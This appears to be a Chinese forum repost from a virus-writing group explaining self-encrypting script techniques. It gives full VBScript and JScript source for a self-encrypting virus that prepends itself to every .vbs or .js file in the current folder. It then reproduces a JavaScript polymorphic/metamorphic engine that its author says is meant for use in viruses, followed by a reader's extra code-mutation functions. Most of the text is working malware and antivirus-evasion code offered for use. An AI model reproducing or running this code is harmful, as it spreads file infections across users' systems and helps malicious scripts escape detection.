[转载]自加密脚本文件(补充版本)
信息来源:cvc当我们讨论加密宏病毒数量时, 会很惊讶并没有那么多的加密脚本病毒。对这个问题我没有更好的解释, 无论如何,这里我为加密VBScript 和JScript 文件提出一个简单的引擎。这个引擎使用一个带有oligomorphic解码器的易变跳跃码加密。这个加密器支持可变空间,随机变量名,随机变量形成,随机事件关键字(仅限VBScript),以及有常数包位数的可变跳跃码,并能在递归中使用。
怎么做?
写自加密脚本的难处在于解密原码本身就是被再加密的,问题就是如何解密源代码, 这里有两种选择: 第一在运行时侯重建源代码,但这不是总那么容易的并且我们需要简单的引擎。 第二, 解密加密后的源代码, 但是只有在结构还不牢固(容易发现和容易分析)的时候这种方法是容易的。 我们在这里使用的就是第二个选择。
跳跃代码(定常)
定常跳跃代码的加密是简单的,在一个串中我们为每第n个字符加上记号,n就是代码的跳跃值。在一个简单串中n=1,所以在串中每个字符都是一个记号。加密就是增加n的值,然后用随机值填写没有用过的记号。
首先,n=1
这是我们的串
然后 n=2, 没有使用过的记号设置在这里。
!t!h!i!s! !i!s! !o!u!r! !s!t!r!i!n!g
在VBScript中用以下代码实现:
for i = n to len(s) step n
d = d + mid(s, i, 1)
next
或者 JScript 代码如下:
d = ""
for (i = n - 1; i < s.length; i += n)
d = d + s.charAt(i)
跳跃码(可变的)
可变跳跃码的加密也是这样的,在一个串中每隔n个字节就是一个记号。但是这里对每个不同的记号可以取不同的n值。这是通过存储包中能整除n值的字符来实行的,包的大小p可以是常量或变量,比如这里有一个大小为3的常量包,每个包中n为第一个字符。看起来像这样
1t!2!h1i!2!s1 !2!i1s!2! 1o!2!u1r!2! 1s!2!t1r!2!i1n!2!g
在这个例子中,n的值在1和2之间变化。在VBScript中用以下代码实现。
for i = 1 to len(s) step p
d = d + mid(s, i + mid(s, i, 1), 1)
next
同样如下JScript 代码:
d = ""
for (i = 0; i < s.length; i += p)
d = d + s.charAt(i + (s.charAt(i) & 15))
同样的结果中"charAt(i) & 15"比 "charCodeAt(i) - 48"字节数更少。
可变包大小仍然可以用在包中存储包的大小来实行,每个包都以包大小p为第一个字符,n为第二个字符。
看起来像这样:
32t!22h33!i22s32 !22i33!s22 32o!22u33!r22 32s!22t33!r22i32n!22g
在这个例子中
p和n的值在2和3之间变化。如下的VBScript代码中实现了这个方法。
for i = 1 to len(s)
d = d + mid(s, i + mid(s, i + 1, 1), 1)
i = i + mid(s, i, 1)
next
同样如下JScript 代码:
d = ""
for (i = 0; i < s.length; i++)
{
d = d + s.charAt(i + (s.charAt(i + 1) & 15))
i = i + (s.charAt(i) & 15)
}
p的值(在中间的(s,i,1))是1小于包的实际大小,因为for循环会自动增加i的值。然后:
无论加密有多棒,薄弱的环节是解密。如果解密器非常的复杂,或者某种意义上来说无可取代,那么没有人会陷入加密过的代码中很简单的研究出解密器本身。在脚本的世界里加密容易,使用很简单的解密器却是一种冒险。因为毫无损失的那个看起来就象我们一样。而且,解码器是可以分层的,然后解码需要很长的时间,而且只有第一层是可变的。
让我们来看看这些代码,只需要WSH v3+因为没有用到新的特性。首先是VBScript dim loff,newl
set fso=createobject("scripting.filesystemobject")
set file=fso.opentextfile(wscript.scriptfullname)
bann=file.readline
oldl=file.readline
file.close
randomize
dospc 1
rcase 8
v1=nvar
outch"("
v2=nvar
outch")" 'function aaaaa(bbbbb)
outch":"
rcase 3
v3=nvar
outch"="
outch"1"
rcase 2
rcase 3
outch"("
outv v2
outch")"
rcase 4
v5=mid(oldl,loff,1) 'old packet size
v6=int(rnd*7)+2 'new data size: 2-8
'if you do not use ! character, then line can be
'v6=int(rnd*7)+2 '1-8
outch cstr(v6+1) 'for ccccc=1 to len(bbbbb) step x
outch":"
v4=nvar
outch"="
rcase 4
outch"("
rcase 3
outch"("
outv v2
outch","
outv v3
outch","
outch"1"
outch")"
outch")" 'ddddd=cint(mid(bbbbb,ccccc,1))
outch":"
outv v1
outch"="
outv v1
outch"+"
rcase 3
outch"("
rcase 3
outch"("
rcase 3
outch"("
outv v2
outch","
outv v3
outch"+"
outv v4
outch","
outch"1"
outch")"
outch")"
outch"-"
outv v4
outch")" 'aaaaa=aaaaa+chr(asc(mid(bbbbb,ccccc+ddddd,1))-ddddd)
outch":"
rcase 4 'next
outch":"
rcase 3
rcase 8 'end function
outch":"
rcase 7
outch"("
outv v1
outch"("
outch chr(34)
cb=instr(mid(oldl,loff),chr(34))
for loff=loff to loff+cb-v5 step v5
oldkey=cint(mid(oldl,loff,1))
do
nkey=int(rnd*v6)+1
c=asc(mid(oldl,loff+oldkey,1))-oldkey+nkey
loop while c=34or c>127 'no " or 8-bit chars
newl=newl+cstr(nkey)
for kl=2to nkey
newl=newl+rchar
next
newl=newl+chr(c)
for kl=kl to v6
newl=newl+rchar
next
next
outch chr(34)
outch")"
outch")" 'execute(aaaaa("encrypted code"))
set dir=fso.getfolder(".") 'demo version, current directory only
for each item in dir.files
if lcase(fso.getextensionname(item))="vbs"then
err=0
set inf=fso.opentextfile(item,1) 'open potential victim
if err.number=0then
fst=inf.read(1) 'read first character
if fst<>"'"then 'check for infection marker
rest=inf.readall 'read entire file
attr=item.attributes 'save attributes
item.attributes=0 'remove any read-only attribute
err=0
set outf=fso.opentextfile(item,2) 'open file for writing
if err.number=0then
outf.writeline(bann) 'prepend banner
outf.writeline(newl) 'prepend code
outf.write(fst+rest) 'append first character and host
outf.close 'close file (write mode)
end if
item.attributes=attr 'restore attributes
end if
inf.close 'close file (read mode)
end if
end if
next
sub dospc(curoff) 'replace space with random number of spaces
if mid(oldl,curoff,1)=" "then
newl=newl+space(rnd*5+1)
while mid(oldl,curoff,1)=" "
curoff=curoff+1
wend
end if
loff=curoff
end sub
sub rcase(lineend) 'random case switch on keywords
for cb=loff to loff+lineend-1
newl=newl+chr(asc(mid(oldl,cb,1))xor(int(rnd*2)*32))
next
dospc loff+lineend
end sub
function rchar 'random case letter
rchar=chr(int(rnd*26)+65+int(rnd*2)*32)
end function
sub outv(tvar) 'variable followed by random number of spaces
newl=newl+tvar
dospc loff+instr(mid(oldl,loff)," ")-1
end sub
function nvar 'random sequence of random case letters
while tv=v1 or tv=v2 or tv=v3 or tv=v4
tv=""
for cb=1to rnd*5+5 '5-9 characters
tv=tv+rchar
next
wend
outv tv
nvar=tv
end function
sub outch(ch) 'character followed by random number of spaces
newl=newl+ch
dospc loff+1
end sub
Now is JScript version.
//Conscrypt - roy g biv 01/02/03
fso=new ActiveXObject("scripting.filesystemobject")
with(inf=fso.opentextfile(WScript.scriptfullname))
{
bann=readline()
oldl=readline()
close()
}
Math.random(1)
newl=""
dospc(0)
outv("function")
var v1=nvar(),v2,v3,v4,v5
outch("(")
v2=nvar()
outch(")") //function aaaaa(bbbbb)
outch("{ ")
v3=nvar()
outch("=")
outv("\"\"") //ccccc=""
outch(";")
outv("for")
outch("(")
v4=nvar()
outch("=")
outch("0")
outch(";")
outv(v4)
outch("<")
outv(v2)
outch(".")
outv("length")
outch(";")
outv(v4)
outv("+=")
v6=oldl.charAt(loff) //old packet size
v7=(Math.random()*7+2)&15 //new data size: 2-8
//if you do not use ! character, then line can be
//v7=(Math.random()*8+1)&15 //1-8
outch(v7+1)
outch(")") //for(ddddd=0;ddddd<bbbbb.length;ddddd+=x)
outch("{ ")
v5=nvar()
outch("=")
outv(v2)
outch(".")
outv("charAt")
outch("(")
outv(v4)
outch(")")
outch("&")
outv("15") //eeeee=bbbbb.charAt(ddddd)&15
outch(";")
outv(v3)
outv("+=")
outv("String")
outch(".")
outv("fromCharCode")
outch("(")
outv(v2)
outch(".")
outv("charCodeAt")
outch("(")
outv(v4)
outch("+")
outv(v5)
outch(")")
outch("-")
outv(v5)
outch(")") //ccccc+=String.fromCharCode(bbbbb.charCodeAt(ddddd+eeeee)-eeeee)
outch(" }")
outv("return")
outv(v3) //return ccccc
outch(" }")
outv("eval")
outch("(")
outv(v1)
outch("(")
outch('"')
for(ss=loff+oldl.substr(loff).search(/"/);loff<ss;loff+=v6&15)
{
oldk=oldl.charAt(loff)&15
do
{
nkey=(Math.random()*v7+1)&15
cca=oldl.charCodeAt(loff+oldk)-oldk+nkey
}
while(cca==34||cca==92||cca>127) //no " or \ or 8-bit chars
newl+=nkey
kl=0
while(++kl<nkey)
newl+=rchar()
newl+=String.fromCharCode(cca)
while(kl++<v7)
newl+=rchar()
}
outch('"')
outch(")")
outch(")") //eval(aaaaa("encrypted code"))
for(enu=new Enumerator(fso.getfolder(".").files);!enu.atEnd();enu.moveNext())
//demo version, current directory only
if(fso.getextensionname(item=enu.item()).toLowerCase()=="js")
try
{
with(inf=fso.opentextfile(item,1)) //open potential victim
{
fst=read(1) //read first character, keep for later
if(fst!="/") //check for infection marker
try
{
rest=readall() //read entire file
attr=item.attributes //save attributes
item.attributes=0 //remove any read-only attribute
with(outf=fso.opentextfile(item,2)) //open file for writing
{
writeline(bann) //prepend banner
writeline(newl) //prepend code
write(fst+rest) //append first character and host
close() //close file (write mode)
}
item.attributes=attr //restore attributes
}
catch(z)
{
}
close() //close file (read mode)
}
}
catch(z)
{
}
function dospc(coff) //replace space with random number of spaces
{
if(oldl.charAt(coff)==" ")
{
cb=0
while(cb++<=Math.random()*5)
newl+=" "
while(oldl.charAt(coff)==" ")
++coff
}
loff=coff
}
/* JScript is case-sensitive so this function is not used
function rcase(lend) //random case switch on keywords
{
for(cb=loff;cb<loff+lend;cb++)
newl+=String.fromCharCode(oldl.charCodeAt(cb)^(Math.round(Math.random())*32))
dospc(loff+lend)
}
*/
function rchar() //random case letter
{
with(Math)return String.fromCharCode(random()*26+65+round(random())*32)
}
function outv(tvar) //variable or keyword followed by random number of spaces
{
newl+=tvar
dospc(loff+oldl.substr(loff).search(/ /))
}
function nvar() //random sequence of random case letters
{
do
{
tv=""
cb=0
while(++cb<Math.random()*5+6) //5-9 characters
tv+=rchar()
}
while(tv==v1||tv==v2||tv==v3||tv==v4||tv==v5)
outv(tv)
return tv
}
function outch(ch) //character followed by random number of spaces
{
newl+=ch
dospc(loff+1)
}
感谢以下的朋友 (A-Z):
Active - Benny - Obleak - Prototype - Ratter - Ronin - RT Fishel -
The Gingerbread Man - Ultras - Vecna - VirusBuster - Whitehead
rgb/2003年2月29日上午
[email]iam_rgb@hotmail.com[/email]
另外一篇
[url]http://www.retcvc.com/cgi-bin/topic.cgi?forum=12&topic=26&show=0[/url]
/****************************************************************************
javascript Poly/Meta Engine (VPME)
By Vancheer/CVC
This code is only for study purpose, I don't take any responsibility for any
malicious effect if you use this code in your virus.
Welcome to my first javascript virus relative work. I had an eventual chance
to use JS, then I found JS is a so powerful language, so I decide to write
something with it.
Following is a little description on this engine.
1, This engine is writen as an javascript object, so to use it, you should
know how JS OOP works. I've seen in the books that says JS is only object-based
or instance-based, not really object-oriented, but I don't think so. I think
it's easy to write beautiful OOP code by using JS.
2, How does this engine work?
Unlike the other script poly engine which encode the main code as a string,
VPME doesn't need a code string. Instead of that, it directly encode its self
body.
When doing poly, it will firstly do a simple meta. It will replace the space(20h),
tabs(09h) and returns(0dh) by random number of space and tabs, this can make
every piece of code has a random offset. Then VPME will replace all variables
which prefixed by a underline('_') with a random string. Beside that, it will
replace all numbers with a random radix, eg, 11 maybe replaced by 0xb or 013.
So to help VPME doing the meta, you should put a space anywhere it's possible and
prefix the variables with a underline.
It's not difficult to parse the JS syntax to distinguish the variable name, but
it will cost more code to do so. So it's not bad to use a prefix to indicate the
variable name.
After the simple meta, VPME then encrypts the code and generates some decryption
code, the decryption code is not very random.
3, How to use VPME?
It's rather simple to use it. What you should do is only to write your own code
in the _run() function. Note, you mustn't put any code out of _main(), you
should write every thing(global variables and functions) in _main(). In _run()
function, to create a new generation, you only need to new a _main object, then
call its _encode() function, that function will return the new code. Then you
can write the return string in the <body> element, and it will be decrypted and
_run() will be called automatically.
Of course you should remove all comment if you use this code in your virus.
4, VPME's disadvantage and potential bugs.
A, The code is a little big, the engine size will be about 12-13K in the generations.
B, The decryption code is not very random.
C, It's very slow to do the poly, so you'd better only create one generation
when your virus runs.
D, It can't hide from N*** if you use some malicious object, eg, fso. I think
N*** and IE will warn when they meet the call to an object, not only parse the
script code, so poly is useless for this.
E, It's not test carefully.
****************************************************************************/
function _main()
{
this._run = function( ) {
/*Write your code here*/
/*Following code is only a sample, you should replace it with your own code.
The sample will write the new generation to e:\ with a 'random' file name as
a hta file, then you can run that hta alone*/
var _fso = new ActiveXObject("Scripting.FileSystemObject") ;
var _date = new Date() ;
var s = "E:\\" + _date.getTime() + ".hta" ;
var _f = _fso.CreateTextFile( s, true ) ;
var _m = new _main() ;
s = _m._encode() ;
s = "<html><head><HTA:APPLICATION BORDER=\"none\" CAPTION=\"no\" SHOWINTASKBAR=\"no\" SINGLEINSTANCE=\"yes\" SYSMENU=\"no\" WINDOWSTATE=\"minimize\"><body><script language=\"javascript\">" + s + "</script></body></html>" ;
_f.write(s);
_f.close();
/*Write your code end*/
}
this._symbolNames = new Array( ) ;
this._polyNames = new Array( ) ;
this._one = 1 ;
this._underLine = '\x5f' ;
this._polyString = "" ;
this._decryptString = "" ;
this._decryptFuncName = "" ;
this._stringName = "" ;
this._keyString = ";+-=,_[]{ }()<>.|&" ;
this._getRand = function( _max ) {
return Math.floor( Math.random() * _max );
}
this._isBlank = function( _ibc ) {
return ( ' ' == _ibc ) || ( '\t' == _ibc ) || ( '\r' == _ibc );
}
this._isDigit = function( _idc , _idis16 ) {
_xidc = _idc.toLowerCase( ) ;
return ( _xidc >= '0' && _xidc <= '9' ) || ( _idis16 && ( _xidc >= "a" && _xidc <= "f" ) );
}
this._isSymbolChar = function( _scc ) {
return ( this._underLine == _scc ) || this._isDigit( _scc , false ) || ( _scc >= 'a' && _scc <= 'z' ) || ( _scc >= 'A' && _scc <= 'Z' ) ;
}
this._findInArray = function( _arr , _ele ) {
var _aindex ;
for( _aindex = 0 ; _aindex < _arr.length ; _aindex = _aindex + this._one )
if( _arr[ _aindex ] == _ele || _arr[ _aindex ].search( new RegExp( _ele ) ) >= 0 || _ele.search( new RegExp( _arr[ _aindex ] ) ) >= 0 ) return _aindex ;
return -1 ;
}
this._getRandString = function( ) {
var _grs = this._underLine ;
var _gindex ;
var _grsrnd ;
var _grsc ;
for( _gindex = 0 ; _gindex < 2 + this._getRand( 3 ) ; _gindex = _gindex + this._one) {
_grsrnd = this._getRand( 4 );
if( 0 == _grsrnd )
_grsc = 0x30 + this._getRand(9) ;
else {
if( 1 == _grsrnd ) _grsc = 0x41 + this._getRand(26) ;
else _grsc = 0x61 + this._getRand(26) ;
}
_grs = _grs + String.fromCharCode( _grsc );
}
return _grs ;
}
this._convertString = function( _constr ) {
var _conrs = "";
var _coni ;
var _conc ;
for( _coni = 0 ; _coni < _constr.length ; _coni = _coni + this._one ) {
_conc = _constr.charAt( _coni ) ;
if( '\x22' == _conc ) _conrs = _conrs + "\\\"" ;
else if( '\x27' == _conc ) _conrs = _conrs + "\\\'" ;
else if( '\x0a' == _conc ) _conrs = _conrs + "\\n" ;
else if( '\\' == _conc ) _conrs = _conrs + "\\\\" ;
else _conrs = _conrs + _conc ;
}
return _conrs ;
}
this.getRandNumber = function( _rn ) {
var _rnret , _rnd2;
if( _rn.charAt( 0 ) == '0' && _rn.length > 1 ) {
_rnret = _rn.charAt( 1 ) ;
if( 'x' == _rnret || 'X' == _rnret )
_rnret = parseInt( _rn.substring( 2 ) , 16 );
else
_rnret = parseInt( _rn.substring( 1 ) , 8 );
}
else
_rnret = parseInt( _rn , 10 );
_rnd2 = this._getRand( 3 ) ;
if( 0 == _rnd2 ) _rnret = "0" + _rnret.toString( 8 ) ;
else { if( 1 == _rnd2 ) _rnret = "0x" + _rnret.toString( 16 ) ;
else _rnret = _rnret.toString( 10 ) ; }
return _rnret ;
}
this._poly = function( _code ) {
var _i , _j ;
var _c , _t ;
var _s = "" ;
var _is16 ;
this._symbolNames.length = 0 ;
this._polyNames.length = 0 ;
for( _i = 0 ; _i < _code.length ; _i = _i + this._one ) {
_c = _code.charAt( _i ) ;
if( this._isBlank( _c ) ) {
while( this._isBlank( _code.charAt( _i ) ) && ( _i < _code.length - this._one ) )
_i = _i + this._one ;
if( !this._isBlank( _code.charAt( _i ) ) )
_i = _i - this._one ;
for( _j = 0 ; _j <= this._getRand( this._one * 5) + this._one ; _j = _j + this._one)
if( this._getRand( this._one * 2) == 0 )
_s = _s + ' ' ;
else
_s = _s + '\t' ;
}
else {
if( this._isDigit( _c ) && this._isBlank( _s.charAt( _s.length - this._one ) ) ) {
_t = "";
_is16 = false ;
while( ( this._isDigit( _c , _is16 ) || "x" == _c || "X" == _c ) && ( _i < _code.length - this._one ) ) {
if( "x" == _c || "X" == _c ) _is16 = true ;
_t = _t + _c ;
_i = _i + this._one ;
_c = _code.charAt( _i ) ;
}
_i = _i - this._one ;
_s = _s + this.getRandNumber( _t ) ;
}
else {
if( "\"" == _c || "'" == _c ) {
_s = _s + _c;
while( _i < ( _code.length - this._one ) ) {
_i = _i + this._one ;
_t = _code.charAt( _i ) ;
_s = _s + _t ;
if( "\\" == _t) {
_i = _i + this._one ;
_s = _s + _code.charAt( _i ) ;
}
if( _t == _c ) break ;
}
}
else {
if( this._underLine == _c) {
_s = _s + _c ;
if(!this._isSymbolChar( _code.charAt( _i - 1) ) ) {
var _sym = this._underLine ;
_i = _i + this._one;
while( this._isSymbolChar( _code.charAt( _i ) ) && _i < ( _code.length - this._one ) ) {
_t = _code.charAt( _i ) ;
_s = _s + _t;
_sym = _sym + _t;
_i = _i + this._one;
}
if( this._findInArray( this._symbolNames , _sym ) < 0 )
this._symbolNames[this._symbolNames.length] = _sym ;
if( !this._isSymbolChar( _code.charAt( _i ) ) )
_i = _i - this._one;
}
}
else
_s = _s + _c ;
}
}
}
}
for( _i = 0 ; _i < this._symbolNames.length ; _i = _i + this._one ) {
_t = this._getRandString( ) ;
_j = 0 ;
while( _j < 50 && ( this._findInArray( this._symbolNames, _t ) >= 0 || this._findInArray( this._polyNames, _t ) >= 0 ) ) {
_t = this._getRandString( ) ;
_j = _j + this._one ;
}
if( _j >= 5 ) _t = "" ;
this._polyNames[this._polyNames.length] = _t ;
if( _t != "" ) {
var _regexp = new RegExp( this._symbolNames[ _i ] ) ;
var _rr = _s ;
for( _j = 0 ; _j < 1000 ; _j = _j + this._one ) {
_rr = _rr.replace( _regexp, _t ) ;
if( _rr == _s ) break;
_s = _rr ;
}
}
}
return _s ;
}
this._encrypt = function( _str ) {
var _es = "" ;
var _ei , _er ;
var _ks = "" ;
var _ec ;
var _kstr = "" ;
for( _ei = 0x61 ;_ei <= 0x7a ; _ei++ ) _kstr = _kstr + String.fromCharCode( _ei ) ;
for( _er = 0x41 ;_er <= 0x5a ; _er++ ) _kstr = _kstr + String.fromCharCode( _er ) ;
for( _ec = 0x30 ;_ec <= 0x39 ; _ec++ ) _kstr = _kstr + String.fromCharCode( _ec ) ;
_kstr = _kstr + this._keyString ;
for ( _ei = 0 ; _ei < 100 ; _ei = _ei + this._one ) {
_er = this._getRand( _kstr.length ) ;
if( _ks.indexOf( _kstr.charAt( _er ) ) < 0 )
_ks = _ks + _kstr.charAt( _er ) ;
}
for ( _ei = 0 ; _ei < _kstr.length ; _ei = _ei + this._one ) {
if( _ks.indexOf( _kstr.charAt( _ei ) ) < 0 )
_ks = _ks + _kstr.charAt( _ei ) ;
}
for( _ei = _str.length - 1 ; _ei >= 0 ; _ei = _ei - this._one ) {
_ec = _str.charAt( _ei ) ;
_er = _ks.indexOf( _ec ) ;
if( _er >= 0 ) _ec = _kstr.charAt( _er ) ;
_es = _es + _ec ;
}
this._decryptFuncName = this._getRandString( ) ;
this._decryptString = this._poly( "( _str ) { var _es = \"\" , _ks = \"" + _ks + "\" , _key =\"\", _sk = \"" + this._keyString + "\" ; var _ei , _er , _ec; for( _ei = 0x61 ;_ei <= 0x7a ; _ei++ ) _key = _key + String.fromCharCode( _ei ) ; for( _er = 0x41 ;_er <= 0x5a ; _er++ ) _key = _key + String.fromCharCode( _er ) ; for( _ec = 0x30 ;_ec <= 0x39 ; _ec++ ) _key = _key + String.fromCharCode( _ec ) ; _key = _key + _sk ; for( _ei = _str.length - 1 ; _ei >= 0 ; _ei-- ) { _ec = _str.charAt( _ei ) ; _er = _key.indexOf( _ec ) ; if( _er >= 0 ) _ec = _ks.charAt( _er ) ; _es = _es + _ec ; } return _es; }" ) ;
this._decryptString = "function " + this._decryptFuncName + this._decryptString;
return _es ;
}
this._encode = function( ) {
var _ni = new String( _main ) ;
_ni = _ni + "\n ( new _main( ) )._run( ) ;" ;
this._stringName = this._getRandString( ) ;
this._polyString = this._poly( _ni ) ;
this._polyString = "var " + this._stringName + " = \"" + this._convertString( this._encrypt( this._polyString ) ) + "\";" ;
return this._decryptString + "\n" + this._polyString + "\n eval(" + this._decryptFuncName + "(" + this._stringName +"));" ;
}
}
我的补充:[冰狐浪子]
//.号小数点//
//-号浮点值1e-4, 1.0e-4//
//i++;i--不能分开//
//i ++//空格不能变回车等
//for( _i = 0 ; _i < _code.length ;_i++ )// ; 号后不可_bx0(9)
//switch (Math.floor(Math.random()*_num)) { //{ 号后不_bx0(9
function bx( _code ) {
var _a,_b,_c ,_d;
var _i;
var _s = '';
for( _i = 0 ; _i < _code.length ;_i++ ) {
_c = _code.charAt( _i ) ;
_d = _code.charAt(_i+1) ;
_b=_c+_d;
//注释的内容不变
if(_b=='/*') {
_s += _b;++_i;
while( _i < _code.length -1 ) {
_c = _code.charAt( ++_i ) ;
_d = _code.charAt( _i+1 ) ;
_b=_c+_d;
_s += _c ;
if( _b =='*/' ) { ++_i;_s += _d;break ; }
}
continue;
}
if(_b=='//') {
_s += _b;_i++;
while( _i < _code.length -1 ) {
_c = _code.charAt( ++_i ) ;
_s += _c ;
if( _c == '\r'||_c == '\n') break ;
}
continue;
}
//引号中的内容不变
//变形:引号前后加括号(),如:("h")
if( _c =='"' || _c == '\'' ) {
/*_s += _c;*/
_s +="("+ _c;
while( _i < _code.length -1 ) {
_d = _code.charAt( ++_i ) ;
_s += _d ;
if( '\\' == _d) { _s += _code.charAt( ++_i ) ; }
if( _d == _c ) { _s +=")";/**/break ; }
}
continue;
}
//正则表达式的内容不变//过滤正则表达式,如:re = /"" abc /gim;
if( _c == '/') {
_a=_i;_b = _s;_s += _c;
while( _i < _code.length -1 ) {
_c = _code.charAt( ++_i ) ;
if( _c == '\r'||_c == '\n'||_i==(_code.length -1) ) { _s=_b+_bx0(5)+'/';if(_d != '=') { _s += _bx0(5); }_i=_a;break ; }//不是正则表达式 /*则是除号在此变形*/ /*_s=_b+'/';*/
_s += _c ;
if( '\\' == _c) { _s += _code.charAt( ++_i ); }
if( _c == '/' ) {
while( _i < _code.length -1 ) {
_c = _code.charAt( ++_i );
if('gim'.indexOf(_c)>= 0) { _s += _c ;continue; }
_s +=_bx0(5);//变形:此处_s可以加上(\r,\n,空格,Tab,注释)
--_i;break;
}
break;
}
}
continue;
}
//变形
if('!%*^&+-<>|()[],.:?~={ }; \t\r\n'.indexOf(_c)>= 0){
//!%*^变形
if('!%*^'.indexOf(_c)>= 0) {
_s += _bx0(5) +_c;
if(_d != '=') { _s += _bx0(5); }
continue;
}
//+-变形
//-号浮点值1e-4, 1.0e-4//
//i++;i--不能分开//
if('+-'.indexOf(_c)>= 0) {
if( _d !=_c && _d != '=') _s += _c + _bx0(5);
else _s += _c;
continue;
}
//&<>|变形
if('&<>|'.indexOf(_c)>= 0) {
if( _s.charAt(_s.length-1) !=_c ) _s += _bx0(5);
if( _d !=_c && _d != '=') _s += _c + _bx0(5);
else _s += _c;
continue;
}
//.变形
//.号小数点//
if(_c=='.') { _s += _c ;continue; }
//()[],:?~变形
//.号小数点//
if('()[],:?~{ ;'.indexOf(_c)>= 0) { _s += _bx0(5) +_c + _bx0(5);continue; }
//=变形
if(_c == '=') {
if( '!%&*+-/<=>^|'.indexOf( _s.charAt(_s.length-1) )< 0 ) _s += _bx0(5);
if(_d != '=') _s += _c + _bx0(5);
else _s += _c;
continue;
}
// }变形
if(_c==' }') {
_s += _bx0(5) + _c + _bx0(9);
continue;
}
//空格和横向跳格(Tab)
if(' ' == _c || '\t' == _c){
_s += Math.random()>0.5?' ':'\t'
continue;
}
//回车及换行
if('\r' == _c || '\n' == _c ){
_s += _bx0(5) + _bx1(4) + _bx0(5);
continue;
}
}
//变形结束
//剩余的
_s += _c ;
}
return _s;
}
//_bx0(5)_bx0(9)
function _bx0(_num)
{
//随机生成 \r \n \n\r \r\n 空格 \t //注释(\r或\n) /*注释*/ *5*9
var _bx="";
switch (Math.floor(Math.random()*_num)) {
case 0:
_bx=_bx1(4);break;
case 1:
_bx=' ';break;
case 2:
_bx='\t';break;
case 3:
_bx='//注释'+_bx1(4);break;
case 4:
_bx='/*注释*/';break;
case 5:
_bx=(Math.random()>0.5?'"字符串"':"'字符串'")+_bx1(5);break;
case 6:
_bx=_bx2(999)+_bx1(5);break;//数字
case 7:
_bx='{ }';break;
case 8:
_bx='(0);';break;//_bx='(0)'+_bx1(5);
case 9:
_bx='[];';break;//_bx='[]'+_bx1(5);
case 10:
_bx='1==1;';break;//无用语句//_bx='1==1'+_bx1(5);
default :
_bx='';
}
return _bx;
}
function _bx1(_num)
{
//随机生成\r \n \r\n \n\r ;
var _bx="";
switch (Math.floor(Math.random()*_num)) {
case 0:
_bx='\r';break;
case 1:
_bx='\n';break;
case 2:
_bx='\n\r';break;
case 3:
_bx='\r\n';break;
default :
_bx=';';
}
return _bx;
}
function _bx2(_num)
{
//随机生成8(0) 10 16(0x 0X AF af) (+ -)号 进制的数字 浮点数(eE) 小数点
var _bx=(Math.random()>0.5?'+':'-');
_bx=(Math.random()>0.5?'':_bx);
_num =Math.floor( Math.random()*_num );
switch (Math.floor(Math.random()*4)) {
case 0:
_bx=_bx+'0'+_num.toString(8);break;
case 1:
_bx=_bx+_num.toString(10);break;
case 2:
_bx=_bx+'0x'+_num.toString(16);break;
case 3:
_bx=_bx+'0'+_num.toString(10);break;
default :
_bx='';
}
return _bx;
}
function ScriptEncoder(code,Script)
{
if (code)return new ActiveXObject("Scripting.Encoder").EncodeScriptFile("."+Script,code,0,"");
}
再用这个编码!
应该可以拉!
页:
[1]